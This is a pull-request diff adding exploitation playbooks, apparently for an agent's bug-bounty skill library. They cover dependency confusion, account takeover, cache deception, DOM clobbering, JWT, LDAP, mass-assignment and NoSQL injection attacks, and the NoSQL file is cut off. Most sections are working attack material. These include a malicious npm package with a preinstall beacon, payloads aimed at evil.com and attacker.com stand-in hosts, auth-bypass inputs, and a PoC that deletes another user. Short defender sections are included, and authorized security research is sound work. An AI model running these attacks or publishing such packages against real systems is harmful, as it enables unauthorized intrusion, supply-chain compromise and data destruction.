### PR TITLE
feat(skills): populate 14 high-pay web vuln-class leaves (JWT/OAuth/SAML/+11)

### DIFF
--- a/skills/exploit/supplychain/dep-confusion/SKILL.md
+++ b/skills/exploit/supplychain/dep-confusion/SKILL.md
@@ -1,0 +1,151 @@
+---
+name: dep-confusion
+description: Dependency confusion — publish a higher-version internal package name on public registry (npm/PyPI/Maven/Crates) to coerce CI/CD into pulling attacker code.
+when_to_use: "dependency confusion npm pypi maven internal package private registry"
+mitre_attack: T1195.002
+metadata:
+  subdomain: supplychain
+  upstream_ref: skills/_corpus/payloads/Dependency Confusion/
+---
+
+# Dependency Confusion (Alex Birsan 2021)
+
+When an org uses **internal** private packages (e.g. `@target-internal/utils`)
+AND a build system that searches BOTH public + private registries, an
+attacker can publish a public package w/ the **same name at higher version**.
+Default resolvers pick highest version → public package runs in CI.
+
+## 1. Reconnaissance — find internal package names
+
+| Source | Pattern |
+|---|---|
+| `package.json` in public repo | `"@target/foo"` scoped packages |
+| `package.json` exfiltrated from web (`/static/`) | dependency lists |
+| Webpack bundles | leaked `package.json` strings |
+| `requirements.txt` / `Pipfile` exposure | `target-internal-lib` |
+| `pom.xml` / `build.gradle` | `<groupId>com.target</groupId>` |
+| Github org code search | `@scope` patterns in user/org-owned repos (sometimes accidentally public) |
+| Stack Overflow / Stack Exchange | engineers asking about internal libs |
+| Sourcegraph public index | broad search across exposed orgs |
+
+```bash
+# Pull all JS bundle URLs from a target
+curl -s "$TARGET" | grep -oP 'src="[^"]*\.js"' | sort -u | while read js; do
+  curl -s "$TARGET$js" | grep -oE '@[a-z0-9_-]+/[a-z0-9_-]+'
+done | sort -u
+```
+
+## 2. Verify the package is private
+
+```bash
+# Check npm public
+npm view @target/internal-utils 2>&1 | grep -E 'E404|not in this registry'
+# E404 = name available publicly → confusion candidate
+
+# PyPI
+pip index versions target-internal-utils
+# "ERROR: No matching distribution" = name available
+
+# Maven Central via search
+curl -s "https://search.maven.org/solrsearch/select?q=g:com.target+AND+a:internal-lib" | jq
+```
+
+If the name is taken publicly already, confusion path closed (unless
+you can take it over — check abandoned packages w/ no maintainer email).
+
+## 3. Build the malicious package
+
+```bash
+mkdir attack-pkg && cd attack-pkg
+
+# package.json
+cat > package.json <<'EOF'
+{
+  "name": "@target/internal-utils",
+  "version": "999.0.0",
+  "description": "auth-research only",
+  "scripts": {
+    "preinstall": "node beacon.js"
+  }
+}
+EOF
+
+# beacon.js — DO NOT execute payload, just confirm install
+cat > beacon.js <<'EOF'
+const https = require('https');
+const os = require('os');
+const dns = require('dns');
+
+// Resolve attacker-controlled subdomain to confirm execution
+// Use Burp Collaborator / interactsh / your own DNS server
+const subdomain = require('crypto').randomBytes(8).toString('hex');
+dns.lookup(`${subdomain}.YOUR_INTERACT_DOMAIN`, () => {});
+
+// Also collect basic env w/o exfil (just locally print for testing)
+console.log({
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  platform: os.platform(),
+  hostname_dns: dns.getServers(),
+});
+EOF
+```
+
+## 4. Publish
+
+```bash
+npm publish --access public
+# For org scopes, may need to register the @scope first
+```
+
+## 5. Wait + observe
+
+Within hours-days, target's CI will pull `999.0.0`. Burp Collaborator
+shows DNS hits.
+
+## 6. Programs that PAY for this
+
+- Microsoft, Apple, PayPal, Tesla, Yelp, Uber, Shopify, Netflix, Yahoo
+  paid out $30k-$130k EACH to Alex Birsan in the original 2021 campaign
+- Many BB programs explicitly accept dep-confusion reports under their
+  "supply chain" scope
+- Bugcrowd has a "Source Code Disclosure / Supply Chain" reward tier
+
+## 7. PoC framing (for the report)
+
+DO NOT:
+- Run any actual exploit logic
+- Exfiltrate any data
+- Steal credentials
+- Disable security
+
+DO:
+- Generate a benign DNS callback (interactsh / Burp Collaborator)
+- Capture the timestamp + source IP from your callback log
+- Document the package as "research-only", deprecate it via npm immediately after PoC
+- Provide cleanup notes: "package @target/internal-utils@999.0.0 published 2026-XX-XX, deprecated 2026-XX-XX, no functional payload"
+
+## 8. Severity
+
+| Bug | Severity |
+|---|---|
+| Confirmed install on production build infra | Critical 10.0 |
+| Confirmed install on staging/dev | Critical 9.0 |
+| Internal package name exposed but no public install attempt | High (depends on data) |
+
+## 9. Defender
+
+- **Block public-registry fallback** for scoped packages: `.npmrc` `@target:registry=https://internal-npm.target.com/`
+- Use lockfiles + integrity hashes (`package-lock.json` w/ `integrity` field)
+- For PyPI: `pip install --index-url internal-pypi/ --extra-index-url public-pypi/` is BACKWARDS — use `--index-url internal-pypi/ --no-index` and explicitly allowlist public packages
+- Reserve internal namespace prefixes on public registries before they're used internally
+- npm: use the `@org` scope and publish a public empty placeholder w/ `private` field
+
+## Cross-references
+- Upstream catalog: `skills/_corpus/payloads/Dependency Confusion/`
+- Alex Birsan's original writeup: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
+
+## Known exemplars
+- Alex Birsan 2021: 35+ Fortune 500 targets, $130k+ in bounties
+- Multiple H1/BC programs continue to pay $3-30k for confirmed installs
+- Repeated incidents in 2022-2024 — pattern not dying

--- a/skills/exploit/web/ato-methodology/SKILL.md
+++ b/skills/exploit/web/ato-methodology/SKILL.md
@@ -1,0 +1,104 @@
+---
+name: ato-methodology
+description: Account Takeover decision tree — 9 canonical ATO paths, chaining patterns (IDOR→ATO, XSS→ATO, OAuth→ATO), MFA bypass entry points.
+when_to_use: "ato account takeover hijack chain password reset email change"
+mitre_attack: T1078, T1110, T1528, T1539
+metadata:
+  subdomain: authentication
+  upstream_ref: skills/_corpus/payloads/Account Takeover/
+---
+
+# Account Takeover (ATO) Methodology
+
+ATO is an outcome, not a vuln class. Reach it via 9 canonical paths.
+
+## 1. Password reset flaws
+- Token in URL leaked to Referer (3rd-party CDN, analytics)
+- Token guessable (timestamp + user_id, sequential int, predictable RNG)
+- Token-no-expiry → reuse forever
+- Reset accepts arbitrary email param (mass-assignment style)
+- Token not invalidated after password change
+- "Forgot username" flows revealing existence
+
+## 2. Email change without re-auth
+`POST /api/users/me/email {email: ...}` without verifying current password.
+Or with verification but verification token leaks.
+
+## 3. Session fixation
+Server accepts attacker-set session cookie. Victim's actions bind to attacker's session.
+
+## 4. JWT-based ATO
+See `skills/exploit/web/jwt/SKILL.md` — alg confusion, weak secret, kid injection.
+
+## 5. OAuth-based ATO
+See `skills/exploit/web/oauth/SKILL.md` — redirect_uri bypass + open-redirect chain → code to attacker.
+
+## 6. IDOR-based ATO
+- `PATCH /api/users/<id>` w/o auth check → change victim's email/password
+- `GET /api/users/<id>/sessions` → harvest victim's session tokens
+
+## 7. XSS-based ATO
+Stored XSS on victim-visible page → exfil cookie / session token to attacker.
+
+## 8. CSRF on critical state
+- CSRF on password change endpoint (no anti-CSRF token)
+- CSRF on email change
+- CSRF on MFA disable
+
+## 9. MFA bypass
+- TOTP code accepted multiple times w/ short delay (race)
+- TOTP code accepted from past N-step (clock skew abuse)
+- Backup-code flow doesn't enforce TOTP
+- "Trust this device" w/o re-auth on critical action
+- Account recovery bypasses MFA entirely
+- Phone-number takeover (SIM swap) → SMS 2FA hijack
+
+## Chain table
+
+| Primary vuln | Chain partner | Outcome |
+|---|---|---|
+| Open redirect | OAuth redirect_uri allowlist | OAuth code → attacker → ATO |
+| XSS (reflected) | session cookie not HttpOnly | Cookie exfil → ATO |
+| XSS (stored) | victim views page | Cookie / session-storage exfil → ATO |
+| IDOR on email change | reset flow | Change victim's email, reset, login |
+| CSRF on password change | predictable URL | Phishing email triggers password change |
+| Predictable reset token | weak RNG audit | Generate victim's token offline → reset |
+| OAuth state missing | account linking by email | Attacker pre-creates account, links victim's OAuth → ATO |
+| JWT alg=none | server accepts | Mint admin JWT → ATO |
+| Email change w/o re-auth + ATO of email | full account graph | Standard playbook for multi-tenant SaaS |
+
+## Decision tree
+
+```
+Has user MFA enabled?
+├── No → Standard password-reset attacks (paths 1-3, 6, 8)
+└── Yes →
+    Bypass MFA available?
+    ├── Yes (path 9) → MFA bypass → standard reset
+    └── No → Look for paths 5, 7 (OAuth, XSS) that bypass MFA by design
+              OR path 4 (JWT) that doesn't touch the MFA flow
+              OR account-linking via OAuth (path 5) which often skips MFA
+```
+
+## PoC framing
+
+Every ATO PoC should:
+- Attacker creates own account
+- Demonstrate victim's account is fully controllable (login as victim, change their email, post as them)
+- Capture video or step-by-step screenshots
+- Show no destructive action taken on victim's actual data — just proof of access
+
+## Severity
+
+ATO is always Critical (9.8-10.0) when fully achieved. Severity downgrade only when:
+- Requires user interaction (click malicious link) — High 8-9 typically
+- Requires multiple vulns to chain — capture the chain in single report
+- Limited to specific user types — caveat in impact
+
+## Cross-references
+- Upstream: `skills/_corpus/payloads/Account Takeover/`
+- JWT: `skills/exploit/web/jwt/SKILL.md`
+- OAuth: `skills/exploit/web/oauth/SKILL.md`
+- IDOR: `skills/analyst/idor.md`
+- XSS: `skills/exploit/web/xss.md`
+- Open redirect: `skills/exploit/web/open-redirect/SKILL.md`

--- a/skills/exploit/web/cache-deception/SKILL.md
+++ b/skills/exploit/web/cache-deception/SKILL.md
@@ -1,0 +1,123 @@
+---
+name: cache-deception
+description: Web cache deception — trick CDN/proxy into caching authenticated responses under unauthenticated URLs, exposing PII to any visitor.
+when_to_use: "cache deception cdn cloudfront cloudflare akamai cache poisoning path-normalization"
+mitre_attack: T1565
+metadata:
+  subdomain: cache
+  upstream_ref: skills/_corpus/payloads/Web Cache Deception/
+---
+
+# Web Cache Deception
+
+Reverse proxies / CDNs cache based on URL extension or path patterns
+(`.css`, `.jpg`, `/static/`). If the origin server returns the
+authenticated page for any path, attacker tricks the cache into storing
+private content under a public-cacheable URL.
+
+## 1. The classic
+```
+GET /account.css     ← attacker visits, in their own session
+                       Cache miss → origin returns /account (authenticated, w/ user cookies in URL or response body)
+                       Cache stores response keyed on /account.css
+
+GET /account.css     ← victim or any unauth visitor
+                       Cache HIT → serves the attacker-cached, victim-data response
+```
+
+## 2. Probe the deception
+
+```bash
+# Step 1: visit authenticated page w/ a fake .css path
+curl -i -H "Cookie: session=$AUTH" $TARGET/account.css | grep -E '^(HTTP|Cache|X-Cache)'
+
+# Look for:
+# Cache-Control: public, max-age=...
+# X-Cache: MISS (then HIT next time)
+# Content-Length consistent w/ /account page (not 404)
+
+# Step 2: from unauth session
+curl -i $TARGET/account.css | grep -E 'HTTP|Cache' && diff_response_bodies
+```
+
+If the second request returns the AUTHENTICATED content of step 1 → deception confirmed.
+
+## 3. Variants
+
+| Variant | Path |
+|---|---|
+| `.css` suffix | `/account/foo.css` |
+| `.jpg` suffix | `/account.jpg` |
+| `/static/` prefix | `/static/../account` |
+| Multiple slashes | `/account//.css` |
+| URL-encoded `;` | `/account%3B.css` |
+| Trailing semi-segment | `/account;foo.css` |
+| Double extension | `/account.html.css` |
+| Path parameter | `/account.css/anything` |
+
+Each cache impl handles these differently. Cloudflare / Fastly / Akamai
+/ Varnish all have known quirks.
+
+## 4. Cache poisoning vs cache deception
+- **Deception** — attacker forces cache of victim's data, served to others
+- **Poisoning** — attacker injects content into a normal cached resource
+
+This skill covers deception. Cache poisoning is a separate (overlapping) class.
+
+## 5. Tools
+- **Param Miner** (Burp plugin) — unkeyed param discovery
+- `webcache.cyberxecution.com` for quick suffix probes
+- Manual via Burp Repeater
+
+## 6. PoC
+
+```python
+import requests
+sess = requests.Session()
+sess.cookies['session'] = 'AUTH_COOKIE'
+
+# 1. Force cache of authenticated response
+r1 = sess.get(f"{TARGET}/account.css")
+print(f"step1 status={r1.status_code} body_hash={hash(r1.text)}")
+
+# 2. Hit same URL unauth
+r2 = requests.get(f"{TARGET}/account.css")
+print(f"step2 status={r2.status_code} body_hash={hash(r2.text)}")
+assert r2.text != "404 not found"
+assert "private_data" in r2.text   # adjust to whatever marker your auth page has
+```
+
+## 7. Severity
+
+| Bug | Severity |
+|---|---|
+| Cache deception exposing PII (email, name, balance) | Critical 8-9 |
+| Cache deception of session token | Critical 9.8 (ATO) |
+| Cache deception of public-only data | Informational |
+| Cache poisoning of script content | Critical 9.0 (RCE-adjacent in browser context) |
+
+## 8. Defender
+
+```nginx
+# Nginx — prefix-based cache keys, NOT extension-based
+location / {
+  proxy_pass http://origin;
+  proxy_cache_key "$scheme$proxy_host$uri";
+  add_header Cache-Control "private, no-store" always;
+}
+
+# Cloudflare — set Cache Rules to require Vary: Cookie + Authorization
+# AND match by Content-Type, not URL extension
+```
+
+Apps should send `Cache-Control: private, no-store` on every authenticated
+response to defeat both deception and poisoning.
+
+## Cross-references
+- Upstream catalog: `skills/_corpus/payloads/Web Cache Deception/`
+- Smuggling overlap: `skills/exploit/web/smuggling.md`
+
+## Known exemplars
+- Omer Gil's original PayPal disclosure (2017)
+- Multiple HackerOne reports $5-15k for cache deception on enterprise SaaS
+- 2023: notable Stripe disclosure of cache deception leading to PII leak

--- a/skills/exploit/web/dom-clobbering/SKILL.md
+++ b/skills/exploit/web/dom-clobbering/SKILL.md
@@ -1,0 +1,127 @@
+---
+name: dom-clobbering
+description: DOM clobbering — abuse named HTML elements to overwrite JavaScript global variables, bypass CSP, hijack object property lookups.
+when_to_use: "dom clobbering window globals named elements anchor form innerhtml csp bypass"
+mitre_attack: T1059.007
+metadata:
+  subdomain: client-side
+  upstream_ref: skills/_corpus/payloads/DOM Clobbering/
+---
+
+# DOM Clobbering
+
+Named HTML elements (`<form>`, `<a>`, `<input>`, `<img>`) with `name=`
+or `id=` are accessible as JavaScript properties of `window` and `document`.
+If app code does `if (window.config.endpoint)` and attacker can inject
+HTML (even sanitized), they can replace `window.config` with an HTML
+element.
+
+## 1. The classic
+```html
+<!-- App code -->
+<script>
+if (window.config && window.config.endpoint) {
+    fetch(window.config.endpoint + '/data');
+}
+</script>
+
+<!-- Attacker-injected HTML (passes most sanitizers — no script/event handlers) -->
+<form id="config"><input name="endpoint" value="//evil.com"></form>
+```
+
+`window.config` resolves to the form. `window.config.endpoint` resolves
+to the input. `.endpoint` is now `"//evil.com"`. App fetches from evil.
+
+## 2. Common targets
+
+- `window.location` overwrite (anchor w/ `id=location`)
+- Library global config (jQuery's `$.cookie`, etc)
+- CSP nonce/source values read from globals
+- `document.cookie` (limited but exploitable)
+- `window.onerror` clobber
+
+## 3. Payload patterns
+
+### Single-element clobber
+```html
+<a id="config" href="//evil.com"></a>
+<!-- window.config is the anchor; window.config.toString() returns "//evil.com" -->
+```
+
+### Multi-level clobber (`a.b.c`)
+```html
+<form id="config"><input name="endpoint" value="//evil.com"></form>
+<!-- window.config.endpoint = "//evil.com" -->
+
+<!-- Deeper nesting via name= chaining is more limited; needs Document Proxy or specific browsers -->
+```
+
+### CSP nonce theft
+```html
+<!-- App: <script nonce="ABC123"> -->
+<form name="nonce"><input name="nonce" value="ABC123"></form>
+<!-- Some code reads window.nonce.value (rare but exists) -->
+```
+
+### Cookie attribute hijack
+```html
+<form name="cookie" action="//evil.com"></form>
+<!-- document.cookie unchanged but some libs read window.cookie -->
+```
+
+## 4. Where to inject
+
+DOM clobbering payloads pass MOST HTML sanitizers (DOMPurify default,
+sanitize-html, bleach) because they contain no script tags or event
+handlers. Targets:
+
+- CMS rich-text content
+- Markdown renderers (especially raw HTML-allowed)
+- Comment systems
+- Profile fields rendered into the page
+
+## 5. Detection
+
+```javascript
+// In browser console on a target page, list all "named" elements that exist:
+Array.from(document.getElementsByTagName('*'))
+  .filter(e => e.name || e.id)
+  .map(e => [e.tagName, e.name || e.id]);
+
+// Then check which of these names also exist as window properties used by app JS
+// (grep app JS bundle for `window.<name>` references)
+```
+
+## 6. PoC
+
+Find an HTML-injection sink (not strict XSS) that passes sanitizer
+because no JS. Inject the form clobber. Confirm via observed network
+request to `//evil.com` (DNS-level via interactsh).
+
+## 7. Severity
+
+| Bug | Severity |
+|---|---|
+| Clobber → CSP bypass enabling stored XSS | Critical 9.0 |
+| Clobber of endpoint → exfil PII | High 8.0 |
+| Clobber of OAuth flow config | Critical 9.0 |
+| Standalone clobber w/o exploitable chain | Low-Medium |
+
+## 8. Defender
+
+- Sanitizers should strip `id=` and `name=` from user content (DOMPurify
+  has `ALLOW_DATA_ATTR: false` + `FORBID_ATTR: ['id', 'name']` config)
+- Use `Object.defineProperty(window, 'config', {value: cfg, writable: false})`
+  for security-critical globals
+- Use scoped namespaces instead of window globals
+- CSP `script-src` w/ hashes (not just nonces) — DOM clobbering can't fake the hash
+
+## Cross-references
+- Upstream: `skills/_corpus/payloads/DOM Clobbering/`
+- XSS overlap: `skills/exploit/web/xss.md`
+- CSS injection (similar tactical mindset): `skills/exploit/web/css-injection/SKILL.md` (when added)
+
+## Known exemplars
+- Gareth Heyes / PortSwigger 2020 paper "DOM Clobbering for fun and profit"
+- Bypass of Google's Closure templating system
+- Multiple HackerOne reports for $5-15k on enterprise CMS clobber chains

--- a/skills/exploit/web/jwt/SKILL.md
+++ b/skills/exploit/web/jwt/SKILL.md
@@ -1,0 +1,140 @@
+---
+name: jwt
+description: JSON Web Token attacks — algorithm confusion (alg=none, HS256↔RS256), kid header injection, JWKS spoofing, weak HMAC secret cracking, signature stripping.
+when_to_use: "jwt json web token bearer signature alg=none kid jwks"
+mitre_attack: T1606.001
+metadata:
+  subdomain: authentication
+  upstream_ref: skills/_corpus/payloads/JSON Web Token/
+---
+
+# JSON Web Token Attacks
+
+JWTs are signed (`HS256`/`RS256`/`ES256`) or sometimes mis-configured to
+accept `none`. The header carries the alg + optionally `kid`/`jku`/`x5u`
+references. Each is a potential exploitation surface.
+
+## 1. Anatomy
+`header.payload.signature` — each base64url. Decode w/ `jwt_tool` or
+`jwt-cracker`:
+```bash
+jwt_tool eyJhbGc...   # decode + verify + tamper modes
+echo "$JWT" | cut -d. -f1-2 | tr '_-' '/+' | base64 -d 2>/dev/null
+```
+
+## 2. Attack surface
+
+### 2.1 `alg=none` bypass
+Set `{"alg":"none"}` in header, strip signature, send `header.payload.`:
+```bash
+jwt_tool $JWT -X a    # alg=none attack
+```
+Worked on auth0 / pyjwt / many home-rolled libs pre-2017. Still appears
+in legacy systems.
+
+### 2.2 HS256 vs RS256 confusion
+Server uses RS256 (asymmetric) and verifies w/ public key. Attacker
+switches `alg` to `HS256` and signs w/ the *public key* (which the server
+will use as the HMAC secret):
+```bash
+# Get the public key
+curl -s https://target/.well-known/jwks.json | jq -r '.keys[0]'
+# Or pull from a redirect / unauth /pubkey endpoint
+
+jwt_tool $JWT -X k -pk public.pem   # alg confusion attack
+```
+
+### 2.3 `kid` header injection
+`kid` (key ID) sometimes resolves to a file path or DB key:
+```json
+{"alg":"HS256","kid":"../../../dev/null"}     // sign with empty content
+{"alg":"HS256","kid":"key1' UNION SELECT 'mykey"}  // SQLi in kid lookup
+```
+`jwt_tool -X i -I -hc kid -hv path` chains kid injection variants.
+
+### 2.4 `jku` / `x5u` URL injection
+`jku` (JWK Set URL) tells the server WHERE to fetch keys. If unvalidated,
+attacker hosts their own:
+```json
+{"alg":"RS256","jku":"https://attacker.com/jwks.json"}
+```
+Then `https://attacker.com/jwks.json` returns attacker's public key,
+signed JWT is "valid".
+
+Bypass URL filters via:
+- subdomain confusion (`https://target.com.attacker.com/jwks.json`)
+- userinfo (`https://attacker.com@target.com/jwks.json`)
+- redirect chains via target's open-redirect
+
+### 2.5 Weak HMAC secret
+HS256 with weak secret crackable offline:
+```bash
+hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
+john --format=HMAC-SHA256 jwt.txt --wordlist=rockyou.txt
+```
+Hashcat mode 16500 = JWT. Service-account secrets often `dev`/`secret`/
+`changeme`/company-name patterns.
+
+### 2.6 Signature stripping (Express.js / older Go libs)
+Some libraries verify only IF a signature is present. Strip it:
+```
+header.payload.    ← trailing dot, no sig
+```
+
+### 2.7 Embedded `jwk` header
+`jwk` in header (vs `jku` pointer) — attacker embeds their own pub key:
+```json
+{"alg":"RS256","jwk":{"kty":"RSA","n":"<attacker_pub>","e":"AQAB"}}
+```
+Old node-jsonwebtoken accepted this.
+
+## 3. Detection in recon
+
+JWT presence signals:
+- `Authorization: Bearer eyJ...` headers
+- `access_token=eyJ...` / `id_token=eyJ...` URL params or cookies
+- `.well-known/jwks.json` endpoint exposed
+- `.well-known/openid-configuration` discovery doc
+
+## 4. PoC pattern (Burp + jwt_tool)
+1. Capture authenticated request
+2. `jwt_tool <JWT> -M at -t <target_url>` — runs **a**ll **t**ests (alg=none, alg confusion, signature strip, weak HMAC dictionary)
+3. For positive results, replay manually via Burp Repeater to confirm
+4. Document the modified JWT + decoded admin claims as PoC
+
+## 5. Severity calibration
+
+| Bug | Typical severity |
+|---|---|
+| `alg=none` accepted on user → admin claim swap | Critical 9.8 |
+| HS256↔RS256 confusion → arbitrary user impersonation | Critical 9.8 |
+| `jku` to attacker URL accepted | Critical 9.8 |
+| Weak HMAC secret cracked offline (admin role) | Critical 9.8 |
+| `kid` SQLi → DB enumeration | High 8.0 |
+| Signature stripping accepted | Critical 9.8 |
+
+## 6. Defender remediation
+
+```javascript
+// Node: jsonwebtoken
+jwt.verify(token, publicKey, {
+    algorithms: ['RS256'],      // EXPLICIT — never accept "none" or HS256 here
+    audience: 'api://my-service',
+    issuer: 'https://auth.mycorp.com',
+});
+
+// Python: PyJWT 2.0+
+jwt.decode(token, public_key, algorithms=['RS256'])  // explicit algorithm
+
+// Validate kid / jku come from a known-good fixed set, NEVER user-controlled lookup
+```
+
+## Cross-references
+- Upstream catalog: `skills/_corpus/payloads/JSON Web Token/`
+- jwt_tool: https://github.com/ticarpi/jwt_tool
+
+## Known exemplars
+- Auth0 alg=none (2015) — historical CVE-2015-2951 era
+- Multiple Github bounty $5-15k for HS256/RS256 confusion in 2018-2021
+- Atlassian 2022: JWT validation bypass in JIRA cloud → admin
+- Several HackerOne $20k+ reports on kid path-traversal + jku to attacker host

--- a/skills/exploit/web/ldapi/SKILL.md
+++ b/skills/exploit/web/ldapi/SKILL.md
@@ -1,0 +1,85 @@
+---
+name: ldapi
+description: LDAP injection — auth bypass via filter manipulation, blind data extraction, search filter abuse, DN injection.
+when_to_use: "ldap injection auth bypass active directory filter dn search"
+mitre_attack: T1190
+metadata:
+  subdomain: injection
+  upstream_ref: skills/_corpus/payloads/LDAP Injection/
+---
+
+# LDAP Injection
+
+LDAP filter syntax: `(attr=value)`, combined with `&` (and), `|` (or), `!` (not).
+User input concatenated into the filter string = injection.
+
+## 1. Auth bypass
+
+```python
+# Vulnerable code
+filter = f"(&(uid={user})(userPassword={pw}))"
+
+# Payload — comment-out rest of filter via wildcard
+user = "*"
+pw   = "*"
+# → (&(uid=*)(userPassword=*)) → matches first user, often admin
+
+user = "admin)(|(uid=*"
+pw   = "anything"
+# → (&(uid=admin)(|(uid=*))(userPassword=anything))
+# → matches admin OR anyone (second clause), password check ignored
+```
+
+## 2. Blind extraction
+```python
+# Boolean-blind: probe each char via wildcard match
+for c in string.printable:
+    payload = f"*)(uid=admin)(description={c}*)"
+    if "found" in response:
+        # next char is c
+```
+
+## 3. DN injection
+```
+# If userdn is constructed from input
+DN = f"cn={user},ou=People,dc=corp,dc=local"
+# user = "admin\,ou=Admins"  → cn=admin,ou=Admins,ou=People,dc=corp,dc=local
+# (or sometimes confuses the bind)
+```
+
+## 4. Common vulnerable apps
+- Custom auth backends w/ python-ldap or ldap3 lib direct-format
+- Legacy Java apps w/ JNDI w/o escaping
+- DokuWiki / older intranets
+
+## 5. Tools
+- Manual via Burp Repeater (most cases need careful crafting)
+- `ldapsearch` to verify directly once you have any cred
+- Burp Intruder w/ payloads from `_corpus/payloads/LDAP Injection/`
+
+## 6. PoC
+```bash
+curl -s -X POST $TARGET/login -d 'user=*&pass=*'   # if logged in → bug
+```
+
+## 7. Severity
+
+| Bug | Severity |
+|---|---|
+| Auth bypass via wildcard | Critical 9.8 |
+| Blind extract of full LDAP directory | Critical 9.0 |
+| DN injection enabling group escalation | High 8.0 |
+
+## 8. Defender
+
+```python
+import ldap3
+# Use parameterized search filters via library helpers
+from ldap3.utils.conv import escape_filter_chars
+safe_user = escape_filter_chars(user)
+conn.search('dc=corp,dc=local', f'(uid={safe_user})')
+```
+
+## Cross-references
+- Upstream catalog: `skills/_corpus/payloads/LDAP Injection/`
+- AD attack patterns (different layer): `skills/ad/SKILL.md`

--- a/skills/exploit/web/mass-assignment/SKILL.md
+++ b/skills/exploit/web/mass-assignment/SKILL.md
@@ -1,0 +1,153 @@
+---
+name: mass-assignment
+description: Mass assignment + ORM leak — inject extra fields into create/update requests, escalate to admin, leak protected fields via response.
+when_to_use: "mass assignment orm leak strong params permit attributes role is_admin"
+mitre_attack: T1190, T1078
+metadata:
+  subdomain: authorization
+  upstream_ref: skills/_corpus/payloads/Mass Assignment/
+---
+
+# Mass Assignment + ORM Leak
+
+API endpoints that bind request JSON straight to model `update()` /
+`create()` without an allowlist can be coerced into setting admin
+fields (`is_admin`, `role`, `verified`, etc).
+
+## 1. Detect
+```bash
+# Capture a legitimate update request
+PATCH /api/users/me
+{"name": "Alice"}
+
+# Try adding common privileged fields
+PATCH /api/users/me
+{"name": "Alice", "is_admin": true, "role": "admin", "verified": true,
+ "balance": 999999, "permissions": ["*"], "isStaff": true,
+ "membership_level": "premium", "tier": "enterprise"}
+```
+
+Re-fetch own profile. If any of the injected fields persists with
+attacker-set value → mass assignment.
+
+## 2. Common field names to try
+```
+is_admin  isAdmin  admin  superuser  is_staff  isStaff  staff
+role  roles  permission  permissions  scope  scopes  group  groups
+verified  email_verified  isVerified  approved  banned  is_banned
+balance  credits  points  reputation
+tier  membership_level  plan  subscription
+created_at  email  user_id  uuid  external_id  organization_id
+password  password_hash
+```
+
+## 3. Framework-specific patterns
+
+### Rails (legacy, pre-strong-params)
+`User.create(params[:user])` → all params mass-assigned. Rails 4+ enforces
+`params.require(:user).permit(:name, :email)`. If permit list is too broad,
+mass assignment.
+
+### Django REST Framework
+`UserSerializer(instance, data=request.data, partial=True).save()` → all
+declared fields settable. Bug: developer adds `is_staff` to serializer
+fields by mistake.
+
+### Express / Mongoose
+```js
+User.findOneAndUpdate({_id: req.params.id}, req.body)
+// → any req.body field becomes a $set. Catastrophic.
+```
+
+### Spring Boot
+`@RequestBody User u` → Jackson binds all settable properties. If `User`
+has setter for `role`, attacker can set it.
+
+### Go / Echo / Gin
+`c.Bind(&user)` → same pattern.
+
+## 4. ORM Leak — the response side
+
+Sometimes the **response** serializer leaks fields the request can't set:
+```bash
+GET /api/users/123
+{
+  "id": 123,
+  "name": "Alice",
+  "email": "alice@target.com",
+  "password_hash": "$2a$12$...",       ← leak!
+  "totp_secret": "JBSW...",            ← leak!
+  "stripe_customer_id": "cus_...",
+  "internal_notes": "VIP customer"
+}
+```
+
+Or via GraphQL field expansion:
+```graphql
+query { user(id: 123) { id name email passwordHash totpSecret } }
+```
+
+## 5. Tools
+- Burp Intruder w/ wordlist of common privileged field names
+- Manual exploration in dev tools — note ALL fields the app sees, try setting each
+
+## 6. PoC
+
+```python
+import requests
+
+# Step 1: Register normal account
+r = requests.post(f"{TARGET}/register", json={
+    "username": "attacker",
+    "password": "test123",
+    "is_admin": True,        # try
+    "role": "admin",         # try
+})
+
+# Step 2: Login + check
+sess = requests.Session()
+sess.post(f"{TARGET}/login", json={"username": "attacker", "password": "test123"})
+me = sess.get(f"{TARGET}/api/users/me").json()
+assert me.get("is_admin") == True   # boom
+
+# Step 3: Use admin powers
+sess.delete(f"{TARGET}/api/users/2")   # delete another user → confirm admin
+```
+
+## 7. Severity
+
+| Bug | Severity |
+|---|---|
+| Mass assignment to `is_admin` / `role` | Critical 9.8 |
+| Mass assignment to `balance` / `credits` | Critical 9.0 |
+| Mass assignment to `email_verified` | High 7-8 (chains to ATO) |
+| ORM leak of password_hash | Critical 9.8 |
+| ORM leak of TOTP secret | Critical 9.8 |
+| ORM leak of internal notes / PII | High 7-8 |
+
+## 8. Defender
+
+```python
+# Django REST Framework — explicit serializer fields, read_only_fields
+class UserSerializer(serializers.ModelSerializer):
+    class Meta:
+        model = User
+        fields = ['name', 'email']    # whitelist
+        read_only_fields = ['id', 'created_at', 'is_admin', 'role']
+
+# Rails — strong params
+def user_params
+  params.require(:user).permit(:name, :email)
+end
+
+# General: NEVER serialize entire model directly. Always project.
+```
+
+## Cross-references
+- Upstream catalog: `skills/_corpus/payloads/Mass Assignment/` + `ORM Leak/`
+- API misconfig: `skills/exploit/web/methodology/` (when added)
+
+## Known exemplars
+- GitHub 2012: Egor Homakov's classic Rails mass-assignment → set someone else as repo collaborator. Cost: company crisis, paper.
+- Multiple Shopify / Atlassian / GitLab bounties for missing strong params
+- 2023 GraphQL mass-introspection-leak campaigns

--- a/skills/exploit/web/nosqli/SKILL.md
+++ b/skills/exploit/web/nosqli/SKILL.md
@@ -1,0 +1,116 @@
+---
+name: nosqli
+description: NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.
+when_to_use: "nosql mongodb mongo couch redis firebase $ne $gt $where injection"
+mitre_attack: T1190, T1212
+metadata:
+  subdomain: injection
+  upstream_ref: skills/_corpus/payloads/NoSQL Injection/
+---
+
+# NoSQL Injection
+
+NoSQL stores parse JSON / native objects. When user input becomes part
+of a query object (not just a value), control flows into the query.
+
+## 1. MongoDB — most common target
+
+### Auth bypass
+```json
+// Vulnerable: db.users.findOne({user: req.body.user, pass: req.body.pass})
+POST /login
+{"user": {"$ne": null}, "pass": {"$ne": null}}      // returns first user
+{"user": "admin", "pass": {"$gt": ""}}              // admin if pw exists
+{"user": "admin", "pass": {"$regex": "^A"}}         // blind char extraction
+```
+
+### Server-side JS injection
+```json
+{"$where": "this.user == 'admin' && sleep(5000)"}   // time-based
+{"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"}
+```
